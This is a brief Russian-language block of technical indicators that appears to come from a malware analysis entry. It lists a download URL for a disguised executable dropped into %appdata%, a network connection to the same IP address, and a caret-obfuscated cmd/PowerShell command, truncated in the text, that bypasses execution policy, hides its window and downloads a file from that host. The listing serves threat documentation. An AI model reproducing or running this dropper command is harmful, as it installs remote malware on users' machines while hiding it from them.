Техническая информация
- http://176.123.26.7/soft_valid/os_inf_ff/01223052/valid_software.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^wEr^s^H^EL^l.^exE ^-exEC^UT^IO^NP^O^L^ICY b^yPa^Ss -n^Op^roF^il^e^ -wi^N^Dow^S^tYlE hId^d^En (^neW^-O^bJECT S^YST^E^M.^N^eT^.w^e^BC^l^I^e^NT^).DOwNLOa^dF^Il^E^('http://176.12...
- '17#.#23.26.7':80
- '<SYSTEM32>\cmd.exe' /C "p^o^wEr^s^H^EL^l.^exE ^-exEC^UT^IO^NP^O^L^ICY b^yPa^Ss -n^Op^roF^il^e^ -wi^N^Dow^S^tYlE hId^d^En (^neW^-O^bJECT S^YST^E^M.^N^eT^.w^e^BC^l^I^e^NT^).DOwNLOa^dF^Il^E^('http://176.12...' (со скрытым окном)